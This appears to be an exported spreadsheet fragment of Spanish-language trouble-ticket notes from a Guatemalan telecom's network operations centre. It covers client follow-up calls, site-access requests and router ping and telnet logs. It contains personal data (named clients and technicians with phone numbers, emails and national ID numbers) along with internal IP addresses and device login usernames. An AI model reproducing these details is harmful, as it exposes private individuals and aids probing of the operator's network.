RE: VERIFICACION FALLAS DE ENLACES CLARO ATM 3147 / CAIDA TOTAL Y REVISION DE EQUIPOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 24207200  RESPONDE FREDY MENCIONA QUE SI CUENTAN CON ENERGIA EN PR
-ID 3001286419
NOMBRE DEL CLIENTE: TRANSACCIONES Y TRANSFERENCIAS S.A.
UBICACIÓN:NARANJO MALL - PRIMER NIVEL, ENTRADA SUPER MERCADO LA TORRE
GESTIÓN DE PERMISOS: LGALINDO@5B.COM.GT -- MONITOREOFALLASATM@5B.COM.GT</t>
  </si>
  <si>
    <t>SE HABLÓ CON ERWIN CHOQUÍN/CLIENTE 42343886 INDICA QUE YA LO ESTÁN VIENDO DE MODO INTERNO, PIDE QUE DE PARTE DE CNOC CLARO LE CONFIRME SI SERÁN LOS MISMOS TÉCNICOS ENVIADOS EN CORREOS ANTERIOR PARA TRAMITAR EL INGRESO PARA LA PRÓXIMA SEMANA.</t>
  </si>
  <si>
    <t>SE LLAMA A ERWIN CHOQUIN - 42343886 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001724493 - 3001725318</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERWIN CHOQUIN -EXT 2416 RESPONDEN Y BRINDAN EL NUMERO DE ERWIN-  42343886
-ID 3001724214</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS GALINDO  AL 59229513 - 24207200 EXT 2345 NO RESPONDE EN EL PRIMER NUMERO ENVIA A BUZON Y EL SEGUNDO AL MARCAR EXT. SE CORTA LLAMADA**
-ID 3001382734 - 3001382909
**</t>
  </si>
  <si>
    <t>SIN RESPUESTA DE CLIENTE - CLIENTE DEBE COORDINAR APERTURA DEL ATM Y PERMISOS EN EL CC PARA DUCTOS Y ODF, SE REENVIA CORREO
RE: VERIFICACION FALLAS DE ENLACES CLARO ATM 3147 / CAIDA TOTAL Y REVISION DE EQUIPOS</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 59229513/24207200 EXT 2345 PARA SEGUIMIENTO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE; ADICIONAL SE LE PIDE APOYO VÍA CORREO:
ASUNTO: RE: VERIFICACION FALLAS DE ENLACES CLARO ATM 3147 / CAIDA TOTAL Y REVISION DE EQUIPOS</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 16 DE JUNIO DE 2022 16:46
PARA: LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; CARLOS ENRIQUE DE LEON &lt;CEDELEON@5B.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; OPERADORES ATM 3 &lt;OPERADORES.ATM3@TAV.COM.GT&gt;; WERNER LOAIZA &lt;WLOAIZA@5B.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; LUIS GALINDO &lt;LGALINDO@5B.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JUAN JOSE VELIZ CERON &lt;JUAN.VELIZ@CLARO.COM.GT&gt;; OPERADORES ATM TAVSA &lt;OPERADORES.ATM@TAV.COM.GT&gt;; ERWIN RAMIREZ &lt;ERWIN.RAMIREZ@TAV.COM.GT&gt;; CARLOS SOSA &lt;CSOSA@5B.COM.GT&gt;
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
ASUNTO: RE: VERIFICACION FALLAS DE ENLACES CLARO ATM 3147 / CAIDA TOTAL Y REVISION DE EQUIPOS
*-*-*-*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 59229513  NO RESPONDE ENVIA A BUZON Y SE LLAMA A L NUMERO 24207200 EXT 2345 NO RESPONDE
-ID 3001546139 - 3001546422
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS GALINDO AL 59229513 -  24207200 EXT 2345  NO RESPONDEN EN AMBOS NUMEROS ||
 SE INTENTARA LUEGO **
-ID 3001270865 - 3001271203
**</t>
  </si>
  <si>
    <t>F4602312</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDGAR MARTINEZ 78322620 MENCIONA QUE NO HAN PRESENTADO PROBLEMA DE ENERGIA Y NO PUEDE APOYAR REALIZANDO PRUEBAS PORQUE LOS EQUIPOS ESTAN EN ALTO
-ID 3001269951
NOMBRE DEL CLIENTE: FARMACEUTICA ANTIGUEÑA SAN MIGUEL S.A.
UBICACIÓN:5 CALLE PONIENTE #15C APARTAMENTO A ANTIGUA GUATEMALA (CERCA DE LA BODEGONA DE ANTIGUA SOBRE LA 5TA CALLE)
CONTACTO EN SITIO: EDGAR MARTINEZ 78322620
HORARIO DE ATENCION:8:00 - 21:00
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  EDGAR MARTINEZ 78322620 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001289096</t>
  </si>
  <si>
    <t>F4602318</t>
  </si>
  <si>
    <t>SE ENVIA GRAFICA DE CONSUMO AL MOMENTO, FAVOR VALIDAR CON CLIENTE MEDIANTE SD, GRACIAS.
ASUNTO: GRAFICA DE CONSUMO SD1135240 || 549454 || COOPERATIVA DE AHORRO Y CREDITO SONAGUERA LTDA -
BUENA TARDE
ESTIMADO SR. CARLOS
ADJUNTO GRAFICA DE CONSUMO HASTA EL MOMENTO,
SALUDOS CORDIALES,
ATTE.
MAR</t>
  </si>
  <si>
    <t>SE ENVIA GRAFICA DE CONSUMO AL MOMENTO, FAVOR VALIDAR CON CLIENTE MEDIANTE SD, GRACIAS.
ASUNTO: GRAFICA DE CONSUMO SD1135240 || 549454 || COOPERATIVA DE AHORRO Y CREDITO SONAGUERA LTDA -</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. CARLOS 95715971 PERO NO RESPONDE
-ID 3001650202</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  SR. CARLOS 95715971 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001648038</t>
  </si>
  <si>
    <t>F4602320</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTIAN HERRERA AL 36894258 SOLICITA LLAMADA PARA MAÑANA A MEDIO DIA **
ID 3001416973
**</t>
  </si>
  <si>
    <t>F4602322</t>
  </si>
  <si>
    <t>TECNICO VALIDANDO WIRELESS CON SANABRIA SE LE LLEGA A PROST.  SE VE MAC PEGADA A POST PERO NO REPONDE A PING WAN DE SERVICIO, SE HACE TRIPARTITA CON TECNICO Y CLIENTE PARA QUE LE UBIQUE  LA DIRECCION , TECNICOS TRASLADANDOSE DESDE XELA, TRASLADO APROXIMADO 30 MINUTOS,, CLIENTE QUEDA NOTIFICADO Y ESTARA ENVIADO LA UBICACION POR WASAP A TECNICO
SIN RESPUESTA A WAN</t>
  </si>
  <si>
    <t>SE CORRIGE TABLA
	WO OPEN                        			9:19
1/4	LUIS RECINOS	58261474	2 HORAS	11:19:00
1/4	ADOLFO CRUZ	58261547	2 HORAS	11:19:00
1/4	EDGAR MATUL	58261564	2 HORAS	11:19:00
1/4	ERICK TRUJILLO	58261561	2 HORAS	11:19:00
1/4	MANUEL MAZARIEGOS	58261521	2 HORAS	11:19:00
1/4	ERICK MORALES	58261630	2 HORAS	11:19:00
2/4	SERGIO NIMATUJ	58261574	3 HORAS	12:19:00
3/4	FABRICIO RAMIREZ	58261213	5 HORAS	14:19:00
4/4	RODOLFO MORALES	58261609	6 HORAS	15:19:00</t>
  </si>
  <si>
    <t>SE LLAMA A TECNIO DICE NO ESTAR ENTERADO DE  LA ACTIVIDAD
LUIS VILLAGRAN
3001286992
COLA:
NOMBRE: A: 58263805
NÚMERO: 58263805
DURACIÓN: 0:01:09
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58263805
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 15/06/2022 10:01:41</t>
  </si>
  <si>
    <t xml:space="preserve">	WO OPEN                        			9:19:00 A. M.
1/4	EMILIO HERNANDEZ	58261540	2 HORAS	11:19:00
1/4	ANTONIO FLORIAN	58261218	2 HORAS	11:19:00
1/4	ESTUARDO LÓPEZ	58261191	2 HORAS	11:19:00
1/4	OSCAR GALLARDO	58261734	2 HORAS	11:19:00
2/4	NESTOR CANO	58261494	3 HORAS	12:19:00
3/4	FABRICIO RAMIREZ	58261213	5 HORAS	14:19:00
4/4	RODOLFO MORALES	58261609	6 HORAS	15:19:00</t>
  </si>
  <si>
    <t>SERVICIO INESTABLE
USERNAME: GESTIONIP
PASSWORD:
CC_COOPERATIVA_OCCIDENTE_GT_SN_RAMON&gt;ENA
PASSWORD:
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;QTZLGTLFN2T1E03A02EIM3&gt;TELNET VPN-INSTANCE CREDITO_OCCIDENTE 10.87.163.150
TRYING 10.87.163.150 ...
PRESS CTRL+K TO ABORT
INFO:PLEASE WAIT FOR A WHILE... CANCELLING USER REQUEST.
&lt;QTZLGTLFN2T1E03A02EIM3&gt;PING -C 1500 -M 30 -B -VPN-INSTANCE CREDITO_OCCIDENTE 10.87.163.150
  PING 10.87.163.150: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    .....!!!!....................................................................................................!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!......................................................................................................................................................................................................................................................................................................
  --- 10.87.163.150 PING STATISTICS ---
    532 PACKET(S) TRANSMITTED
    133 PACKET(S) RECEIVED
    75.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 33/49/99 MS
&lt;QTZLGTLFN2T1E03A02EIM3&gt;PING -C 1500 -M 30 -B -VPN-INSTANCE CREDITO_OCCIDENTE 10.87.163.150
  PING 10.87.163.150: 56  DATA BYTES, PRESS CTRL_C TO BREAK</t>
  </si>
  <si>
    <t>SE CORTA LLAMADA CON TECNICO NO SE TIENE RESPUESTA DE CPE TECNCO NO LOGRA ADMINISTRAR LOCALMENTE CPE</t>
  </si>
  <si>
    <t>EN GESTION CON TECNCIO PARA REVISION DE DATOS, SE VE QUE EN OTRA FALLA EL ROUTER ESTA NEGOCIANDO AUTOMATICO LA INTERFAZ WAN, SE LE INDICA AL TECNICO QUE FORCE LA MISMA A FULL 100 SE QUEDA A LA ESPERA DE LA SOLUCION POR PARTE DE TECNICO</t>
  </si>
  <si>
    <t>TECNICO NO LOGRA INGRESAR A RUTER CISCO ES NECESARIO CAMBIAR NEGOCIACION EN WAN
&lt;QTZLGTLFN2T1E03A02EIM3&gt;PING -C 1500 -M 30 -B -VPN-INSTANCE CREDITO_OCCIDENTE 10.87.163.150
  PING 10.87.163.150: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    ...............................................................................................................................................!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!....................................................................................................................................................................................!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.87.163.150 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1177 PACKET(S) RECEIVED
    21.53% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 27/48/88 MS
&lt;QTZLGTLFN2T1E03A02EIM3&gt;
&lt;QTZLGTLFN2T1E03A02EIM3&gt;
&lt;QTZLGTLFN2T1E03A02EIM3&gt;PING -C 1500 -M 30 -B -VPN-INSTANCE CREDITO_OCCIDENTE 10.87.163.150
  PING 10.87.163.150: 56  DATA BYTES, PRESS CTRL_C TO BREAK</t>
  </si>
  <si>
    <t>F4602339</t>
  </si>
  <si>
    <t>##SERVICIO ACTIVO, LLAMAAS AL GN 21337400 COMPLETAN ###  SE VALIDARA A LAS 12## A SOLICITUD DE CLEINTE ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALVARO PORTILLO-78554212  MENCIONA QUE TODO ESTA FUNCIONANDO BIEN PERO POR SER RECURRENTE EL PROBLEMA SOLICITA LLAMADA PARA MAÑANA AL MEDIO DIA VALIDAR EL FUNCIONAMIENTO
-ID 3001422357</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALVARO PORTILLO-78554212 PARA QQUE REALICE PRUEBAS ##NO CONTESTA ##ENVIA A BUZON 3 VECES ##VIVO
CLIENTE DEBE REALIZAR PRUEBAS##</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALVARO PORTILLO-78554212 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001414781 - 3001415135</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALVARO PORTILLO-78554212 3 VECES ##ENVIA A BUZON##SERVICIO UP ##VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALVARO PORTILLO AL 78554212  SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
-ID 3001306302 - 3001306770
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALVARO PORTILLO 78554212 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001274205</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALVARO PORTILLO-78554212 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001561749</t>
  </si>
  <si>
    <t>F4602362</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANKLIN ORRELLANA AL 44990369 INDICA QUE NOS COMUNIQUEMOS AL PR PARA VERIFICAR SI ELLOS SOLICITARON ESOS PERMISOS **
-ID 3001475843
**</t>
  </si>
  <si>
    <t>###SE MANDA CORREO AL CLIENTE PARA GESTIONAR PERMISOS ##
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: MIÉRCOLES, 15 DE JUNIO DE 2022 12:23
PARA: TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC-CALLCENTER@BANRURAL.COM.GT &lt;TIC-CALLCENTER@BANRURAL.COM.GT&gt;; TIC-CALLCENTER@BANRURAL.COM.G &lt;TIC-CALLCENTER@BANRURAL.COM.G&gt;; TIC-CALLCENTER@BANRURAL.COM.GT &lt;TIC-CALLCENTER@BANRURAL.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTION DE PERMISOS | 8900743T |BANCO DE DESARROLLO RURAL, S.A. | 1 CALLE FRENTE A LA IGLESIA CATOLICA ZUNILITO MAZATENANGO
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO  8900743T |BANCO DE DESARROLLO RURAL, S.A.   | 1 CALLE FRENTE A LA IGLESIA CATOLICA ZUNILITO MAZATENANGO
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
PEDROZA MARTINEZ, NERY ALBERTO        699416     1908740660506
MEJIA GAMEROS, HECTOR MAURICIO       659267     1766752561001
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS GONZALES AL 58549594 INDICA QUE YA SE TIENEN PERMISOS DE LA MUNICIPALIDAD PARA QUE TRABAJE EL PERSONAL TECNICO**
-ID 3001476416
**</t>
  </si>
  <si>
    <t>F4602365</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 55103219 ENVIA DIRECTO A BUZON
-ID 3001277909</t>
  </si>
  <si>
    <t>**SE LLAMA AL PR 55103219 ENVIA DIRECTO A BUZON || SE INTENTARA LUEGO **
-ID 3001292909
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR 55103219 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001366578
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 MENCIONA QUE NO CUENTA CON OTRO NUMERO PERO AL CONTAR CON ALGUNO LO ESTARA ENVIANDO POR CORREO
-ID 3001278463</t>
  </si>
  <si>
    <t>F4602387</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE OSCAR NO RESPONDE
3001286443
COLA:
NOMBRE: A: 58588140
NÚMERO: 58588140
DURACIÓN: 0:00:31
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 58588140
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 09:59:10
3001286623
COLA:
NOMBRE: A: 58588140
NÚMERO: 58588140
DURACIÓN: 0:00:14
ESTADO: MARCANDO
DETALLES: 58588140
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 09:59:21</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSCAR ROSALES 58588140 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001284200</t>
  </si>
  <si>
    <t>SE LE INFORMA AL CLIENTE OSCAR ROSALES
3001363270
COLA:
NOMBRE: A: 58588140
NÚMERO: 58588140
DURACIÓN: 0:00:07
ESTADO: MARCANDO
DETALLES: 58588140
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 13:17:51</t>
  </si>
  <si>
    <t>F4602388</t>
  </si>
  <si>
    <t>CLIENTE  OSCAR ROSALES SOLICITA QUE SE REALICE VISITA TECNICA OP 108 QUE RECIBE LOS E1 DE LOS SERVICIOS
24453900
24218350
24453800
ESTA SIN LINK DE FO, CLIENTE YA REINICIO Y EN LA REPISA SE OBSERVA CAIDO TAMBIEN, NO SE REQUIEREN PERMISOS DE INGRESO.
3001290690
COLA:
NOMBRE: A: 58588140
NÚMERO: 58588140
DURACIÓN: 0:00:08
ESTADO: CONECTADA
DETALLES: 58588140
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 10:10:26</t>
  </si>
  <si>
    <t>F4602391</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE OSCAR ROSALES 58588140 QUIEN CONFIRMA EL SERVICIO OPERATIVO, SE PROCEDE CON EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4602400</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ORELLANA, FRANKLIN 23081000 EXT 301646 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001589635
**</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL,  PERO NO RESPONDEN SE INENTARA LUEGO
-ID 3001296645</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE A LA CENTRAL AL 23081000  NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001321631
**</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL  MENCIONA QUE OBSERVA EL SERVICIO OPERATIVO PERO SOLICITA LLAMADA PARA MAÑANA A LAS 13:00 HRS VALIDAR EL FUNCIONAMIENTO
-ID 3001359296</t>
  </si>
  <si>
    <t>F4602402</t>
  </si>
  <si>
    <t>SE LLAMA A WALTER REYES 45787911 QUIEN SOLICITA LAS GRAFICAS A NIVEL DE LA WAN, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001297909</t>
  </si>
  <si>
    <t>F4602406</t>
  </si>
  <si>
    <t>SE GESTIONA ACCESOS
GESTION DE ACCESOS F4602406| 560600001T |HOTEL LONGARONE, S.A. |INTERNET_KM. 126.5 CARRETERA AL ATLANTICO ALDEA SANTA CRUZ RIO HONDO ZACAPA
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:AMONTALVO@GRUPOKAM.COM
CC:CNOCCA;GRUPO N1
MIÉ 15/06/2022 10:35
BUENA TARDE ESTIMADO CLIENTE,
   ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA  SOLICITAR DE SU AMABLE APOYO CON GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA VERIFICAR SERVICIO,
 F4602406| 560600001T |HOTEL LONGARONE, S.A.  |INTERNET_KM. 126.5 CARRETERA AL ATLANTICO ALDEA SANTA CRUZ RIO HONDO ZACAPA
AGRADECEMOS BRINDAR FECHA Y HORA DE VISITA
TÉCNICOS:
TECNICO 	IBM	DPI
 DIAZ ALDANA WILLIAM EDGARDO	559550	2703302911501
EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>F4602413</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROY CALDERON 89279267 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001310555</t>
  </si>
  <si>
    <t>F4602422</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ERWIN CHOQUIN 42343886 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001402465</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERWIN CHOQUIN MENCIONA QUE YA ENVIARON LA SOLICITUD AL IGSS Y CUANDO YA TENGAN RESPUESTA ESTARAN RESPONDIENDO POR CORREO
-ID 3001302687</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERWIN CHOQUIN42343886  MENCIONA QUE NO CUENTA CON EL HORARIO DE PR PERO SOLICITA SE REALICE LA VISITA
-ID 3001396396</t>
  </si>
  <si>
    <t>F4602423</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARMINA ZUÑIGA 42744968 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001322043</t>
  </si>
  <si>
    <t>F4602424</t>
  </si>
  <si>
    <t>SRTA. ELSA 95246520 INFORMA QUE ROBERTO DE CLARO LE ESTA APOYANDO PARA SOLVENTAR EL INCIDENTE, APLICO REINICIO A LOS EQUIPOS PERO ENLACE AUN NO LEVANTA, SE VALIDA QUE LEVANTO A NIVEL DE PING PERO NO TIENE GESTION, NO ACEPTA NINGUN PASSWORD CONOCIDO. SOLICITA APOYO CON VISITA TECNICA....
&lt;YPROHNBCN1D1EIM1&gt;PING 10.2.136.194
  PING 10.2.136.194: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.2.136.194: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.2.136.194: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.2.136.194: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.2.136.194: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.2.136.194: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.2.136.194 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;YPROHNBCN1D1EIM1&gt;TEL 10.2.136.194
TRYING 10.2.136.194 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.2.136.194 ...
LOGIN AUTHENTICATION
USERNAME:CLARO
PASSWORD:
ERROR: AUTHENTICATION FAILED.
  ERROR:LOGGED FAIL!
  PLEASE RETRY AFTER 5 SECONDS.
USERNAME:SERCOM
PASSWORD:
ERROR: AUTHENTICATION FAILED.
  ERROR:LOGGED FAIL!
  PLEASE RETRY AFTER 10 SECONDS.
USERNAME:CLARO
PASSWORD:
ERROR: AUTHENTICATION FAILED.
  ERROR:LOGGED FAIL!
  INFO:CONFIGURATION CONSOLE EXIT, PLEASE RETRY TO LOG ON
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.</t>
  </si>
  <si>
    <t>SE LLAMA A SRTA. ELSA 95246520 ID: 3001284023 ...</t>
  </si>
  <si>
    <t>F4602429</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER RAMIREZ 49417909 PARA BRINDAR RETROALIMENTACION PERO NO RESPONDE
-ID 3001324423</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ABNER RODRIGUEZ 30960012 PARA BRINDAR RETROALIMENTACION
-ID 3001324951</t>
  </si>
  <si>
    <t>F4602433</t>
  </si>
  <si>
    <t>SE LLAMO A JOSE LUIS SE LE EXPONE INCONVENIENTE PERO AL PARECER NO SABE DE LAS CONEXIONES INTERNAS SOLO SABE QUE EL PANEL DEBE DE TENER CONEXION HACIA ROUTER PERO NO OBSERVA CABLE FLOJO O DESCONECTADO- SE LLAMO A JONATHAN PERO ENVIA A BUZON, A NIVEL DE CLARO TODO OK. CLIENTE DEBERA DE VALIDAR A NIVEL INTERNO LAN DESCONECTADA-</t>
  </si>
  <si>
    <t>F4602441</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ASTRID CALDERON 50093286 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001326867</t>
  </si>
  <si>
    <t>F4602442</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 94529742 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001327753</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAIRO RAMOS 94529742 INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO QUE REALIZARA PRUEBAS Y SOLICITA QUE SE LE LLAME EN 1 HR **
-ID 3001281157
**</t>
  </si>
  <si>
    <t>F4602452</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEJANDRO HERNANDEZ 78557883 MENCIONA QUE YA ESTAN GESTIONADOS LOS PERMISOS CON PR
-ID 3001328752</t>
  </si>
  <si>
    <t>F4602465</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LIC ADAN GONZALEZ 78702205 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001337749</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LIC ADAN GONZALEZ 78702205 MENCIONA QUE TIENE UN IVR QUE INDICA QUE TIENE MORA
SE VALIDARA SI ESTA PENDIENTE DE PAGO
-ID 3001338687</t>
  </si>
  <si>
    <t>F4602476</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELVIS DE LEON 47124247 ##VALIDA ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELVIS DE LEON 47124247 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA EN 5 MIN
-ID 3001294576</t>
  </si>
  <si>
    <t>F4602478</t>
  </si>
  <si>
